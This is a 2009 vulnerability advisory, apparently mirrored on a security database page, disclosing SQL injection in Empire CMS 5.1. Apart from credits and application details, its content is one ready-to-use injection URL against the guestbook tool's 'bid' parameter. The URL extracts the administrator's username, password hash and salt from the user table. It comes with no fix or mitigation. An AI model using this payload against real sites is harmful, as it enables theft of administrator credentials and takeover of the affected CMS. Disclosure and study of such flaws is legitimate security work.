Lucene search
SecurityvulnsSECURITYVULNS:DOC:22107HistoryJul 01, 2009 - 12:00 a.m.
Empire Cms 5.1 sql injection
2009-07-0100:00:00
vulners.com
34
######################### Securitylab.ir ########################
Application Info:
Name: Empire Cms
Version: 5.1
Download: http://www.phome.net/OpenSource/download/EmpireCMS_5.1os_SC_GBK.zip
#################################################################
Discoverd By: Securitylab.ir
Website: http://Securitylab.ir
Contacts: admin[at]securitylab.ir & [email protected]
#################################################################
Vulnerability Info:
Type: Sql Injection
Risk: Medium
#===========================================================
http://site.com/e/tool/gbook/?bid=1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where
userid=1),1,1,1,0,0,0)/*
#===========================================================
Securitylab Security Research Team
###################################################################